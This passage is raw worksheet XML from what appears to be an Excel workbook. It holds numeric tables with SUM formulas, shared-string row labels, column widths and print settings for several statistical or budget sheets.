        <f>C8+D8+E8+F8+J8</f>
        <v>2200</v>
      </c>
      <c r="C8" s="23">
        <v>740</v>
      </c>
      <c r="D8" s="23">
        <v>370</v>
      </c>
      <c r="E8" s="23">
        <v>160</v>
      </c>
      <c r="F8" s="113">
        <f>SUM(G8:H8)</f>
        <v>700</v>
      </c>
      <c r="G8" s="23">
        <v>490</v>
      </c>
      <c r="H8" s="23">
        <v>210</v>
      </c>
      <c r="I8" s="23">
        <v>100</v>
      </c>
      <c r="J8" s="113">
        <f t="shared" si="3"/>
        <v>230</v>
      </c>
      <c r="K8" s="23">
        <v>230</v>
      </c>
      <c r="L8" s="23">
        <v>0</v>
      </c>
    </row>
    <row r="9" spans="1:12" ht="18" customHeight="1">
      <c r="A9" s="134" t="s">
        <v>385</v>
      </c>
      <c r="B9" s="114">
        <f t="shared" si="1"/>
        <v>990</v>
      </c>
      <c r="C9" s="23">
        <v>55</v>
      </c>
      <c r="D9" s="23">
        <v>92</v>
      </c>
      <c r="E9" s="23">
        <v>123</v>
      </c>
      <c r="F9" s="113">
        <f t="shared" si="2"/>
        <v>652</v>
      </c>
      <c r="G9" s="23">
        <v>425</v>
      </c>
      <c r="H9" s="23">
        <v>227</v>
      </c>
      <c r="I9" s="23">
        <v>15</v>
      </c>
      <c r="J9" s="113">
        <f t="shared" si="3"/>
        <v>68</v>
      </c>
      <c r="K9" s="23">
        <v>68</v>
      </c>
      <c r="L9" s="23"/>
    </row>
    <row r="10" spans="1:12" ht="18" customHeight="1">
      <c r="A10" s="134" t="s">
        <v>386</v>
      </c>
      <c r="B10" s="114">
        <f t="shared" si="1"/>
        <v>1350</v>
      </c>
      <c r="C10" s="23"/>
      <c r="D10" s="23">
        <v>1350</v>
      </c>
      <c r="E10" s="23"/>
      <c r="F10" s="113">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="G10" s="23"/>
      <c r="H10" s="23"/>
      <c r="I10" s="23"/>
      <c r="J10" s="113">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K10" s="23"/>
      <c r="L10" s="23"/>
    </row>
    <row r="11" spans="1:12" ht="18" customHeight="1">
      <c r="A11" s="134" t="s">
        <v>387</v>
      </c>
      <c r="B11" s="114">
        <f t="shared" si="1"/>
        <v>7930</v>
      </c>
      <c r="C11" s="23"/>
      <c r="D11" s="23">
        <v>123</v>
      </c>
      <c r="E11" s="23">
        <v>1920</v>
      </c>
      <c r="F11" s="113">
        <f t="shared" si="2"/>
        <v>4042</v>
      </c>
      <c r="G11" s="23">
        <v>2366</v>
      </c>
      <c r="H11" s="23">
        <v>1676</v>
      </c>
      <c r="I11" s="23">
        <v>357</v>
      </c>
      <c r="J11" s="113">
        <f t="shared" si="3"/>
        <v>1845</v>
      </c>
      <c r="K11" s="23">
        <v>1583</v>
      </c>
      <c r="L11" s="23">
        <v>262</v>
      </c>
    </row>
    <row r="12" spans="1:12" ht="18" customHeight="1">
      <c r="A12" s="134" t="s">
        <v>388</v>
      </c>
      <c r="B12" s="114">
        <f t="shared" si="1"/>
        <v>2800</v>
      </c>
      <c r="C12" s="23"/>
      <c r="D12" s="23">
        <v>2800</v>
      </c>
      <c r="E12" s="23"/>
      <c r="F12" s="113">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="G12" s="23"/>
      <c r="H12" s="23"/>
      <c r="I12" s="23"/>
      <c r="J12" s="113">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K12" s="23"/>
      <c r="L12" s="23"/>
    </row>
    <row r="13" spans="1:12" ht="18" customHeight="1">
      <c r="A13" s="134" t="s">
        <v>389</v>
      </c>
      <c r="B13" s="114">
        <f>C13+D13+E13+F13+J13</f>
        <v>948</v>
      </c>
      <c r="C13" s="23">
        <v>130</v>
      </c>
      <c r="D13" s="23">
        <v>147</v>
      </c>
      <c r="E13" s="23">
        <v>168</v>
      </c>
      <c r="F13" s="113">
        <f t="shared" si="2"/>
        <v>133</v>
      </c>
      <c r="G13" s="23">
        <v>61</v>
      </c>
      <c r="H13" s="23">
        <v>72</v>
      </c>
      <c r="I13" s="23">
        <v>98</v>
      </c>
      <c r="J13" s="113">
        <f t="shared" si="3"/>
        <v>370</v>
      </c>
      <c r="K13" s="23">
        <v>175</v>
      </c>
      <c r="L13" s="23">
        <v>195</v>
      </c>
    </row>
    <row r="14" spans="1:12" ht="18" customHeight="1">
      <c r="A14" s="134" t="s">
        <v>390</v>
      </c>
      <c r="B14" s="114">
        <f t="shared" si="1"/>
        <v>3200</v>
      </c>
      <c r="C14" s="23">
        <v>400</v>
      </c>
      <c r="D14" s="23">
        <v>650</v>
      </c>
      <c r="E14" s="23">
        <v>1800</v>
      </c>
      <c r="F14" s="113">
        <f t="shared" si="2"/>
        <v>350</v>
      </c>
      <c r="G14" s="23">
        <v>150</v>
      </c>
      <c r="H14" s="23">
        <v>200</v>
      </c>
      <c r="I14" s="23"/>
      <c r="J14" s="113">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K14" s="23"/>
      <c r="L14" s="23"/>
    </row>
    <row r="15" spans="1:12" ht="18" customHeight="1">
      <c r="A15" s="134" t="s">
        <v>391</v>
      </c>
      <c r="B15" s="114">
        <f t="shared" si="1"/>
        <v>8300</v>
      </c>
      <c r="C15" s="23">
        <v>2000</v>
      </c>
      <c r="D15" s="23">
        <v>4500</v>
      </c>
      <c r="E15" s="23">
        <v>500</v>
      </c>
      <c r="F15" s="113">
        <f t="shared" si="2"/>
        <v>1300</v>
      </c>
      <c r="G15" s="23">
        <v>1300</v>
      </c>
      <c r="H15" s="23"/>
      <c r="I15" s="23">
        <v>1300</v>
      </c>
      <c r="J15" s="113">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K15" s="23"/>
      <c r="L15" s="23"/>
    </row>
    <row r="16" spans="1:12" ht="18" customHeight="1">
      <c r="A16" s="134" t="s">
        <v>392</v>
      </c>
      <c r="B16" s="114">
        <f t="shared" si="1"/>
        <v>3000</v>
      </c>
      <c r="C16" s="23"/>
      <c r="D16" s="23">
        <v>498</v>
      </c>
      <c r="E16" s="23">
        <v>2000</v>
      </c>
      <c r="F16" s="113">
        <v>301</v>
      </c>
      <c r="G16" s="23">
        <v>300</v>
      </c>
      <c r="H16" s="23"/>
      <c r="I16" s="23">
        <v>1</v>
      </c>
      <c r="J16" s="113">
        <f t="shared" si="3"/>
        <v>201</v>
      </c>
      <c r="K16" s="23">
        <v>200</v>
      </c>
      <c r="L16" s="23">
        <v>1</v>
      </c>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="8">
    <mergeCell ref="A1:D1"/>
    <mergeCell ref="J3:L3"/>
    <mergeCell ref="F3:I3"/>
    <mergeCell ref="A3:A4"/>
    <mergeCell ref="B3:B4"/>
    <mergeCell ref="C3:C4"/>
    <mergeCell ref="D3:D4"/>
    <mergeCell ref="E3:E4"/>
  </mergeCells>
  <printOptions horizontalCentered="1" verticalCentered="1"/>
  <pageMargins left="0.9448818897637796" right="0.5511811023622047" top="0.7874015748031497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6.875" style="48" customWidth="1"/>
    <col min="2" max="2" width="9.625" style="48" customWidth="1"/>
    <col min="3" max="5" width="7.625" style="48" customWidth="1"/>
    <col min="6" max="6" width="7.625" style="0" customWidth="1"/>
    <col min="7" max="8" width="7.125" style="0" customWidth="1"/>
    <col min="9" max="11" width="7.625" style="0" customWidth="1"/>
    <col min="12" max="12" width="7.875" style="0" customWidth="1"/>
    <col min="13" max="13" width="8.375" style="0" customWidth="1"/>
    <col min="14" max="15" width="8.00390625" style="0" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:15" ht="14.25">
      <c r="A1" s="83" t="s">
        <v>306</v>
      </c>
      <c r="B1" s="83"/>
      <c r="C1" s="83"/>
      <c r="D1" s="83"/>
      <c r="E1" s="84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4.25">
      <c r="A2" s="84"/>
      <c r="B2" s="84"/>
      <c r="C2" s="84"/>
      <c r="D2" s="84"/>
      <c r="E2" s="84"/>
      <c r="F2" s="15"/>
      <c r="G2" s="15"/>
      <c r="H2" s="15"/>
      <c r="I2" s="15"/>
      <c r="J2" s="15"/>
      <c r="K2" s="15"/>
      <c r="L2" s="15"/>
      <c r="M2" s="15" t="s">
        <v>324</v>
      </c>
      <c r="N2" s="15"/>
      <c r="O2" s="15"/>
    </row>
    <row r="3" spans="1:15" ht="24.75" customHeight="1">
      <c r="A3" s="50" t="s">
        <v>177</v>
      </c>
      <c r="B3" s="50" t="s">
        <v>0</v>
      </c>
      <c r="C3" s="60" t="s">
        <v>195</v>
      </c>
      <c r="D3" s="60" t="s">
        <v>196</v>
      </c>
      <c r="E3" s="60" t="s">
        <v>197</v>
      </c>
      <c r="F3" s="59" t="s">
        <v>198</v>
      </c>
      <c r="G3" s="59" t="s">
        <v>199</v>
      </c>
      <c r="H3" s="59" t="s">
        <v>200</v>
      </c>
      <c r="I3" s="59" t="s">
        <v>201</v>
      </c>
      <c r="J3" s="59" t="s">
        <v>202</v>
      </c>
      <c r="K3" s="59" t="s">
        <v>203</v>
      </c>
      <c r="L3" s="59" t="s">
        <v>204</v>
      </c>
      <c r="M3" s="59" t="s">
        <v>205</v>
      </c>
      <c r="N3" s="59" t="s">
        <v>206</v>
      </c>
      <c r="O3" s="59" t="s">
        <v>207</v>
      </c>
    </row>
    <row r="4" spans="1:15" s="21" customFormat="1" ht="18" customHeight="1">
      <c r="A4" s="56" t="s">
        <v>10</v>
      </c>
      <c r="B4" s="53">
        <f aca="true" t="shared" si="0" ref="B4:O4">SUM(B5:B15)</f>
        <v>41</v>
      </c>
      <c r="C4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="D4" s="53">
        <f t="shared" si="0"/>
        <v>2</v>
      </c>
      <c r="E4" s="53">
        <f t="shared" si="0"/>
        <v>1</v>
      </c>
      <c r="F4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="G4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="H4" s="53">
        <f t="shared" si="0"/>
        <v>1</v>
      </c>
      <c r="I4" s="53">
        <f t="shared" si="0"/>
        <v>1</v>
      </c>
      <c r="J4" s="53">
        <f t="shared" si="0"/>
        <v>7</v>
      </c>
      <c r="K4" s="53">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
      <c r="L4" s="53">
        <f t="shared" si="0"/>
        <v>7</v>
      </c>
      <c r="M4" s="53">
        <f t="shared" si="0"/>
        <v>13</v>
      </c>
      <c r="N4" s="53">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
      <c r="O4" s="53">
        <f t="shared" si="0"/>
        <v>1</v>
      </c>
    </row>
    <row r="5" spans="1:15" ht="18" customHeight="1">
      <c r="A5" s="134" t="s">
        <v>382</v>
      </c>
      <c r="B5" s="82">
        <f>SUM(C5:O5)</f>
        <v>3</v>
      </c>
      <c r="C5" s="23"/>
      <c r="D5" s="23"/>
      <c r="E5" s="23"/>
      <c r="F5" s="23"/>
      <c r="G5" s="23"/>
      <c r="H5" s="23"/>
      <c r="I5" s="23"/>
      <c r="J5" s="23">
        <v>1</v>
      </c>
      <c r="K5" s="23">
        <v>2</v>
      </c>
      <c r="L5" s="23"/>
      <c r="M5" s="23"/>
      <c r="N5" s="23"/>
      <c r="O5" s="23"/>
    </row>
    <row r="6" spans="1:15" ht="18" customHeight="1">
      <c r="A6" s="134" t="s">
        <v>383</v>
      </c>
      <c r="B6" s="82">
        <f aca="true" t="shared" si="1" ref="B6:B15">SUM(C6:O6)</f>
        <v>3</v>
      </c>
      <c r="C6" s="23"/>
      <c r="D6" s="23"/>
      <c r="E6" s="23"/>
      <c r="F6" s="23"/>
      <c r="G6" s="23"/>
      <c r="H6" s="23"/>
      <c r="I6" s="23">
        <v>1</v>
      </c>
      <c r="J6" s="23"/>
      <c r="K6" s="23">
        <v>1</v>
      </c>
      <c r="L6" s="23"/>
      <c r="M6" s="23">
        <v>1</v>
      </c>
      <c r="N6" s="23"/>
      <c r="O6" s="23"/>
    </row>
    <row r="7" spans="1:15" ht="18" customHeight="1">
      <c r="A7" s="134" t="s">
        <v>384</v>
      </c>
      <c r="B7" s="82">
        <f t="shared" si="1"/>
        <v>2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1</v>
      </c>
      <c r="K7" s="23">
        <v>0</v>
      </c>
      <c r="L7" s="23">
        <v>0</v>
      </c>
      <c r="M7" s="23">
        <v>1</v>
      </c>
      <c r="N7" s="23">
        <v>0</v>
      </c>
      <c r="O7" s="23">
        <v>0</v>
      </c>
    </row>
    <row r="8" spans="1:15" ht="18" customHeight="1">
      <c r="A8" s="134" t="s">
        <v>385</v>
      </c>
      <c r="B8" s="82">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="C8" s="23"/>
      <c r="D8" s="23"/>
      <c r="E8" s="23">
        <v>1</v>
      </c>
      <c r="F8" s="23"/>
      <c r="G8" s="23"/>
      <c r="H8" s="23"/>
      <c r="I8" s="23"/>
      <c r="J8" s="23"/>
      <c r="K8" s="23"/>
      <c r="L8" s="23">
        <v>1</v>
      </c>
      <c r="M8" s="23">
        <v>1</v>
      </c>
      <c r="N8" s="23"/>
      <c r="O8" s="23"/>
    </row>
    <row r="9" spans="1:15" ht="18" customHeight="1">
      <c r="A9" s="134" t="s">
        <v>386</v>
      </c>
      <c r="B9" s="82">
        <f t="shared" si="1"/>
        <v>6</v>
      </c>
      <c r="C9" s="23"/>
      <c r="D9" s="23"/>
      <c r="E9" s="23"/>
      <c r="F9" s="23"/>
      <c r="G9" s="23"/>
      <c r="H9" s="23"/>
      <c r="I9" s="23"/>
      <c r="J9" s="23"/>
      <c r="K9" s="23">
        <v>1</v>
      </c>
      <c r="L9" s="23">
        <v>1</v>
      </c>
      <c r="M9" s="23">
        <v>3</v>
      </c>
      <c r="N9" s="23">
        <v>1</v>
      </c>
      <c r="O9" s="23"/>
    </row>
    <row r="10" spans="1:15" ht="18" customHeight="1">
      <c r="A10" s="134" t="s">
        <v>387</v>
      </c>
      <c r="B10" s="82">
        <v>3</v>
      </c>
      <c r="C10" s="23"/>
      <c r="D10" s="23"/>
      <c r="E10" s="23"/>
      <c r="F10" s="23"/>
      <c r="G10" s="23"/>
      <c r="H10" s="23">
        <v>1</v>
      </c>
      <c r="I10" s="23"/>
      <c r="J10" s="23"/>
      <c r="K10" s="23"/>
      <c r="L10" s="23"/>
      <c r="M10" s="23">
        <v>1</v>
      </c>
      <c r="N10" s="23">
        <v>1</v>
      </c>
      <c r="O10" s="23"/>
    </row>
    <row r="11" spans="1:15" ht="18" customHeight="1">
      <c r="A11" s="134" t="s">
        <v>388</v>
      </c>
      <c r="B11" s="82">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="C11" s="23"/>
      <c r="D11" s="23">
        <v>1</v>
      </c>
      <c r="E11" s="23"/>
      <c r="F11" s="23"/>
      <c r="G11" s="23"/>
      <c r="H11" s="23"/>
      <c r="I11" s="23"/>
      <c r="J11" s="23">
        <v>1</v>
      </c>
      <c r="K11" s="23"/>
      <c r="L11" s="23">
        <v>1</v>
      </c>
      <c r="M11" s="23">
        <v>2</v>
      </c>
      <c r="N11" s="23"/>
      <c r="O11" s="23"/>
    </row>
    <row r="12" spans="1:15" ht="18" customHeight="1">
      <c r="A12" s="134" t="s">
        <v>389</v>
      </c>
      <c r="B12" s="82">
        <f t="shared" si="1"/>
        <v>4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1</v>
      </c>
      <c r="K12" s="23">
        <v>0</v>
      </c>
      <c r="L12" s="23">
        <v>1</v>
      </c>
      <c r="M12" s="23">
        <v>2</v>
      </c>
      <c r="N12" s="23">
        <v>0</v>
      </c>
      <c r="O12" s="23">
        <v>0</v>
      </c>
    </row>
    <row r="13" spans="1:15" ht="18" customHeight="1">
      <c r="A13" s="134" t="s">
        <v>390</v>
      </c>
      <c r="B13" s="82">
        <f t="shared" si="1"/>
        <v>6</v>
      </c>
      <c r="C13" s="23"/>
      <c r="D13" s="23"/>
      <c r="E13" s="23"/>
      <c r="F13" s="23"/>
      <c r="G13" s="23"/>
      <c r="H13" s="23"/>
      <c r="I13" s="23"/>
      <c r="J13" s="23">
        <v>2</v>
      </c>
      <c r="K13" s="23"/>
      <c r="L13" s="23">
        <v>2</v>
      </c>
      <c r="M13" s="23"/>
      <c r="N13" s="23">
        <v>2</v>
      </c>
      <c r="O13" s="23"/>
    </row>
    <row r="14" spans="1:15" ht="18" customHeight="1">
      <c r="A14" s="134" t="s">
        <v>391</v>
      </c>
      <c r="B14" s="82">
        <f t="shared" si="1"/>
        <v>3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>
        <v>2</v>
      </c>
      <c r="N14" s="23"/>
      <c r="O14" s="23">
        <v>1</v>
      </c>
    </row>
    <row r="15" spans="1:15" ht="18" customHeight="1">
      <c r="A15" s="134" t="s">
        <v>392</v>
      </c>
      <c r="B15" s="82">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="C15" s="23"/>
      <c r="D15" s="23">
        <v>1</v>
      </c>
      <c r="E15" s="23"/>
      <c r="F15" s="23"/>
      <c r="G15" s="23"/>
      <c r="H15" s="23"/>
      <c r="I15" s="23"/>
      <c r="J15" s="23">
        <v>1</v>
      </c>
      <c r="K15" s="23"/>
      <c r="L15" s="23">
        <v>1</v>
      </c>
      <c r="M15" s="23"/>
      <c r="N15" s="23"/>
      <c r="O15" s="23"/>
    </row>
    <row r="16" ht="12.75" customHeight="1"/>
  </sheetData>
  <sheetProtection/>
  <printOptions horizontalCentered="1" verticalCentered="1"/>
  <pageMargins left="0.9055118110236221" right="0.03937007874015748" top="0.7874015748031497" bottom="0.5905511811023623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pane ySplit="4" topLeftCell="A5" activePane="bottomLeft" state="frozen"/>
      <selection pane="topLeft" activeCell="B28" sqref="B28:B29"/>
      <selection pane="bottomLeft" activeCell="A5" sqref="A5"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="6.375" style="0" customWidth="1"/>
    <col min="2" max="2" width="11.125" style="0" customWidth="1"/>
    <col min="3" max="3" width="8.50390625" style="0" customWidth="1"/>
    <col min="4" max="4" width="7.75390625" style="0" customWidth="1"/>
    <col min="5" max="5" width="7.875" style="0" customWidth="1"/>
    <col min="6" max="7" width="8.00390625" style="0" customWidth="1"/>
    <col min="8" max="8" width="8.625" style="0" customWidth="1"/>
    <col min="9" max="9" width="8.75390625" style="0" customWidth="1"/>
    <col min="10" max="10" width="10.625" style="0" customWidth="1"/>
    <col min="11" max="12" width="10.25390625" style="0" customWidth="1"/>
    <col min="13" max="13" width="11.375" style="0" customWidth="1"/>
    <col min="14" max="15" width="10.375" style="0" customWidth="1"/>
    <col min="16" max="16" width="9.125" style="0" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:14" ht="14.25">
      <c r="A1" s="162" t="s">
        <v>305</v>
      </c>
      <c r="B1" s="162"/>
      <c r="C1" s="162"/>
      <c r="D1" s="162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 t="s">
        <v>325</v>
      </c>
    </row>
    <row r="3" spans="1:15" ht="29.25" customHeight="1">
      <c r="A3" s="50" t="s">
        <v>208</v>
      </c>
      <c r="B3" s="50" t="s">
        <v>0</v>
      </c>
      <c r="C3" s="60" t="s">
        <v>78</v>
      </c>
      <c r="D3" s="60" t="s">
        <v>77</v>
      </c>
      <c r="E3" s="60" t="s">
        <v>76</v>
      </c>
      <c r="F3" s="59" t="s">
        <v>79</v>
      </c>
      <c r="G3" s="59" t="s">
        <v>80</v>
      </c>
      <c r="H3" s="59" t="s">
        <v>75</v>
      </c>
      <c r="I3" s="59" t="s">
        <v>74</v>
      </c>
      <c r="J3" s="59" t="s">
        <v>73</v>
      </c>
      <c r="K3" s="59" t="s">
        <v>72</v>
      </c>
      <c r="L3" s="59" t="s">
        <v>71</v>
      </c>
      <c r="M3" s="59" t="s">
        <v>70</v>
      </c>
      <c r="N3" s="59" t="s">
        <v>206</v>
      </c>
      <c r="O3" s="59" t="s">
        <v>69</v>
      </c>
    </row>
    <row r="4" spans="1:15" s="21" customFormat="1" ht="18.75" customHeight="1">
      <c r="A4" s="56" t="s">
        <v>10</v>
      </c>
      <c r="B4" s="53">
        <f aca="true" t="shared" si="0" ref="B4:O4">SUM(B5:B15)</f>
        <v>2219767</v>
      </c>
      <c r="C4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="D4" s="53">
        <f t="shared" si="0"/>
        <v>1600</v>
      </c>
      <c r="E4" s="53">
        <f t="shared" si="0"/>
        <v>1567</v>
      </c>
      <c r="F4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="G4" s="87">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="H4" s="53">
        <f t="shared" si="0"/>
        <v>5000</v>
      </c>
      <c r="I4" s="53">
        <f t="shared" si="0"/>
        <v>18000</v>
      </c>
      <c r="J4" s="53">
        <f t="shared" si="0"/>
        <v>147100</v>
      </c>
      <c r="K4" s="53">
        <f t="shared" si="0"/>
        <v>164000</v>
      </c>
      <c r="L4" s="53">
        <f t="shared" si="0"/>
        <v>310000</v>
      </c>
      <c r="M4" s="53">
        <f t="shared" si="0"/>
        <v>910500</v>
      </c>
      <c r="N4" s="53">
        <f t="shared" si="0"/>
        <v>460000</v>
      </c>
      <c r="O4" s="53">
        <f t="shared" si="0"/>
        <v>202000</v>
      </c>
    </row>
    <row r="5" spans="1:16" ht="18.75" customHeight="1">
      <c r="A5" s="134" t="s">
        <v>382</v>
      </c>
      <c r="B5" s="82">
        <f>SUM(C5:O5)</f>
        <v>92100</v>
      </c>
      <c r="C5" s="23"/>
      <c r="D5" s="23"/>
      <c r="E5" s="23"/>
      <c r="F5" s="23"/>
      <c r="G5" s="23"/>
      <c r="H5" s="23"/>
      <c r="I5" s="23"/>
      <c r="J5" s="23">
        <v>28100</v>
      </c>
      <c r="K5" s="23">
        <v>64000</v>
      </c>
      <c r="L5" s="23"/>
      <c r="M5" s="23"/>
      <c r="N5" s="23"/>
      <c r="O5" s="23"/>
      <c r="P5" s="136">
        <v>92100</v>
      </c>
    </row>
    <row r="6" spans="1:16" ht="18.75" customHeight="1">
      <c r="A6" s="134" t="s">
        <v>383</v>
      </c>
      <c r="B6" s="82">
        <f aca="true" t="shared" si="1" ref="B6:B15">SUM(C6:O6)</f>
        <v>98000</v>
      </c>
      <c r="C6" s="23"/>
      <c r="D6" s="23"/>
      <c r="E6" s="23"/>
      <c r="F6" s="23"/>
      <c r="G6" s="23"/>
      <c r="H6" s="23"/>
      <c r="I6" s="23">
        <v>18000</v>
      </c>
      <c r="J6" s="23"/>
      <c r="K6" s="23">
        <v>30000</v>
      </c>
      <c r="L6" s="23"/>
      <c r="M6" s="23">
        <v>50000</v>
      </c>
      <c r="N6" s="23"/>
      <c r="O6" s="23"/>
      <c r="P6" s="136">
        <v>98000</v>
      </c>
    </row>
    <row r="7" spans="1:16" ht="18.75" customHeight="1">
      <c r="A7" s="134" t="s">
        <v>384</v>
      </c>
      <c r="B7" s="82">
        <f t="shared" si="1"/>
        <v>92500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92500</v>
      </c>
      <c r="N7" s="23">
        <v>0</v>
      </c>
      <c r="O7" s="23">
        <v>0</v>
      </c>
      <c r="P7" s="136">
        <v>92500</v>
      </c>
    </row>
    <row r="8" spans="1:16" ht="18.75" customHeight="1">
      <c r="A8" s="134" t="s">
        <v>385</v>
      </c>
      <c r="B8" s="82">
        <f t="shared" si="1"/>
        <v>106567</v>
      </c>
      <c r="C8" s="23"/>
      <c r="D8" s="23"/>
      <c r="E8" s="23">
        <v>1567</v>
      </c>
      <c r="F8" s="23"/>
      <c r="G8" s="86"/>
      <c r="H8" s="23"/>
      <c r="I8" s="23"/>
      <c r="J8" s="23"/>
      <c r="K8" s="23"/>
      <c r="L8" s="23">
        <v>45000</v>
      </c>
      <c r="M8" s="23">
        <v>60000</v>
      </c>
      <c r="N8" s="23"/>
      <c r="O8" s="23"/>
      <c r="P8" s="136">
        <v>106567</v>
      </c>
    </row>
    <row r="9" spans="1:16" ht="18.75" customHeight="1">
      <c r="A9" s="134" t="s">
        <v>386</v>
      </c>
      <c r="B9" s="82">
        <f t="shared" si="1"/>
        <v>455000</v>
      </c>
      <c r="C9" s="23"/>
      <c r="D9" s="23"/>
      <c r="E9" s="23"/>
      <c r="F9" s="23"/>
      <c r="G9" s="23"/>
      <c r="H9" s="23"/>
      <c r="I9" s="23"/>
      <c r="J9" s="23"/>
      <c r="K9" s="23">
        <v>30000</v>
      </c>
      <c r="L9" s="23">
        <v>85000</v>
      </c>
      <c r="M9" s="23">
        <v>220000</v>
      </c>
      <c r="N9" s="23">
        <v>120000</v>
      </c>
      <c r="O9" s="23"/>
      <c r="P9" s="136">
        <v>455000</v>
      </c>
    </row>
    <row r="10" spans="1:16" ht="18.75" customHeight="1">
      <c r="A10" s="134" t="s">
        <v>387</v>
      </c>
      <c r="B10" s="82">
        <f t="shared" si="1"/>
        <v>165000</v>
      </c>
      <c r="C10" s="23"/>
      <c r="D10" s="23"/>
      <c r="E10" s="23"/>
      <c r="F10" s="23"/>
      <c r="G10" s="23"/>
      <c r="H10" s="23">
        <v>5000</v>
      </c>
      <c r="I10" s="23"/>
      <c r="J10" s="23"/>
      <c r="K10" s="23"/>
      <c r="L10" s="23"/>
      <c r="M10" s="23">
        <v>60000</v>
      </c>
      <c r="N10" s="23">
        <v>100000</v>
      </c>
      <c r="O10" s="23"/>
      <c r="P10" s="136">
        <v>165000</v>
      </c>
    </row>
    <row r="11" spans="1:16" ht="18.75" customHeight="1">
      <c r="A11" s="134" t="s">
        <v>388</v>
      </c>
      <c r="B11" s="82">
        <f t="shared" si="1"/>
        <v>180800</v>
      </c>
      <c r="C11" s="23"/>
      <c r="D11" s="23">
        <v>800</v>
      </c>
      <c r="E11" s="23"/>
      <c r="F11" s="23"/>
      <c r="G11" s="23"/>
      <c r="H11" s="23"/>
      <c r="I11" s="23"/>
      <c r="J11" s="23">
        <v>28000</v>
      </c>
      <c r="K11" s="23"/>
      <c r="L11" s="23">
        <v>45000</v>
      </c>
      <c r="M11" s="23">
        <v>107000</v>
      </c>
      <c r="N11" s="23"/>
      <c r="O11" s="23"/>
      <c r="P11" s="136">
        <v>180800</v>
      </c>
    </row>
    <row r="12" spans="1:16" ht="18.75" customHeight="1">
      <c r="A12" s="134" t="s">
        <v>389</v>
      </c>
      <c r="B12" s="82">
        <f t="shared" si="1"/>
        <v>236000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20000</v>
      </c>
      <c r="K12" s="23">
        <v>0</v>
      </c>
      <c r="L12" s="23">
        <v>45000</v>
      </c>
      <c r="M12" s="23">
        <v>171000</v>
      </c>
      <c r="N12" s="23">
        <v>0</v>
      </c>
      <c r="O12" s="23">
        <v>0</v>
      </c>
      <c r="P12" s="136">
        <v>236000</v>
      </c>
    </row>
    <row r="13" spans="1:16" ht="18.75" customHeight="1">
      <c r="A13" s="134" t="s">
        <v>390</v>
      </c>
      <c r="B13" s="82">
        <f t="shared" si="1"/>
        <v>381000</v>
      </c>
      <c r="C13" s="23"/>
      <c r="D13" s="23"/>
      <c r="E13" s="23"/>
      <c r="F13" s="23"/>
      <c r="G13" s="23"/>
      <c r="H13" s="23"/>
      <c r="I13" s="23"/>
      <c r="J13" s="23">
        <v>51000</v>
      </c>
      <c r="K13" s="23"/>
      <c r="L13" s="23">
        <v>90000</v>
      </c>
      <c r="M13" s="23"/>
      <c r="N13" s="23">
        <v>240000</v>
      </c>
      <c r="O13" s="23"/>
      <c r="P13" s="136">
        <v>381000</v>
      </c>
    </row>
    <row r="14" spans="1:16" ht="18.75" customHeight="1">
      <c r="A14" s="134" t="s">
        <v>391</v>
      </c>
      <c r="B14" s="82">
        <f t="shared" si="1"/>
        <v>352000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>
        <v>150000</v>
      </c>
      <c r="N14" s="23"/>
      <c r="O14" s="23">
        <v>202000</v>
      </c>
      <c r="P14" s="136">
        <v>352000</v>
      </c>
    </row>
    <row r="15" spans="1:16" ht="18.75" customHeight="1">
      <c r="A15" s="134" t="s">
        <v>392</v>
      </c>
      <c r="B15" s="82">
        <f t="shared" si="1"/>
        <v>60800</v>
      </c>
      <c r="C15" s="23"/>
      <c r="D15" s="23">
        <v>800</v>
      </c>
      <c r="E15" s="23"/>
      <c r="F15" s="23"/>
      <c r="G15" s="23"/>
      <c r="H15" s="23"/>
      <c r="I15" s="23"/>
      <c r="J15" s="23">
        <v>20000</v>
      </c>
      <c r="K15" s="23">
        <v>40000</v>
      </c>
      <c r="L15" s="23"/>
      <c r="M15" s="23"/>
      <c r="N15" s="23"/>
      <c r="O15" s="23"/>
      <c r="P15" s="136">
        <v>60800</v>
      </c>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="1">
    <mergeCell ref="A1:D1"/>
  </mergeCells>
  <printOptions horizontalCentered="1" verticalCentered="1"/>
  <pageMargins left="0.1968503937007874" right="0.03937007874015748" top="0.7874015748031497" bottom="0.5905511811023623" header="0.5118110236220472" footer="0.5118110236220472"/>
  <pageSetup horizontalDpi="300" verticalDpi="300" orientation="landscape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pane ySplit="6" topLeftCell="A7" activePane="bottomLeft" state="frozen"/>
      <selection pane="topLeft" activeCell="B28" sqref="B28:B29"/>
      <selection pane="bottomLeft" activeCell="B6" sqref="B6"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="6.125" style="0" customWidth="1"/>
    <col min="2" max="2" width="11.25390625" style="0" customWidth="1"/>
    <col min="3" max="3" width="11.50390625" style="0" customWidth="1"/>
    <col min="4" max="4" width="10.50390625" style="0" customWidth="1"/>
    <col min="5" max="5" width="10.75390625" style="0" customWidth="1"/>
